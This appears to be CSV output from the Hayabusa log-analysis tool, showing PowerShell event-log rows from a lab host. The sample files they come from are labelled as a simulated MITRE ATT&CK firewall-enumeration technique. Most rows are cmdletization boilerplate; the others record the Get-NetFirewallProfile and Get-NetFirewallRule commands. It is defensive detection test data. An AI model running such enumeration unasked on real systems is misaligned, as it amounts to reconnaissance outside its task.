($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.207 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['Enabled'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Enabled'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]($this.PSBase.CimInstanceProperties['DefaultInboundAction'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['DefaultInboundAction'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]($this.PSBase.CimInstanceProperties['DefaultOutboundAction'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['DefaultOutboundAction'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowInboundRules'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowInboundRules'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowLocalFirewallRules'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowLocalFirewallRules'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowLocalIPsecRules'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowLocalIPsecRules'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowUserApps'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowUserApps'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowUserPorts'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowUserPorts'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowUnicastResponseToMulticast'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowUnicastResponseToMulticast'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['NotifyOnListen'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['NotifyOnListen'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['EnableStealthModeForIPsec'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnableStealthModeForIPsec'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$x = $this.PSBase.CimInstanceProperties[""LogMaxSizeKilobytes""]; if ($x -ne $null -and $x.Value -ne $null -and $x.Value.ToString().ToUpperInvariant().Equals(""4294967296"")) { ""NotConfigured""; } else { $x.Value }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param($x) if ($x.ToUpperInvariant().Equals(""NOTCONFIGURED"")) { $this.PSBase.CimInstanceProperties[""LogMaxSizeKilobytes""].Value = 4294967296; } else { $this.PSBase.CimInstanceProperties[""LogMaxSizeKilobytes""].Value = [uint32]$x; }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['LogAllowed'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['LogAllowed'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['LogBlocked'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['LogBlocked'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['LogIgnored'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['LogIgnored'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.473 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallProfile): ""Get-NetFirewallProfile"" ParameterBinding(Get-NetFirewallProfile): name=""Name""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""AssociatedNetFirewallRule""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""AssociatedNetIPsecRule""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""AssociatedNetIPsecMainModeRule""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallProfile): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""CimSession""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallProfile): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.489 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallProfile (InstanceID = ""MSFT?FW?FirewallProfile?Domain"")"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallProfile (InstanceID = ""MSFT?FW?FirewallProfile?Private"")"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallProfile (InstanceID = ""MSFT?FW?FirewallProfile?Public"")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.489 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is ""System.Management.Automation.CommandNotFoundException"")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(""."", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.489 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""The command $($lastError.TargetObject) was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type `"".\$($lastError.TargetObject)`"". See `""get-help about_Command_Precedence`"" for more details.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.489 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.223 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallRule,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.239 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$this.PSBase.CimInstanceProperties[""DisplayName""].Value",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param($x) ; $this.PSBase.CimInstanceProperties[""DisplayName""].Value = $x ; $this.PSBase.CimInstanceProperties[""ElementName""].Value = $x",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled]($this.PSBase.CimInstanceProperties['Enabled'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Enabled'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]($this.PSBase.CimInstanceProperties['Profiles'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
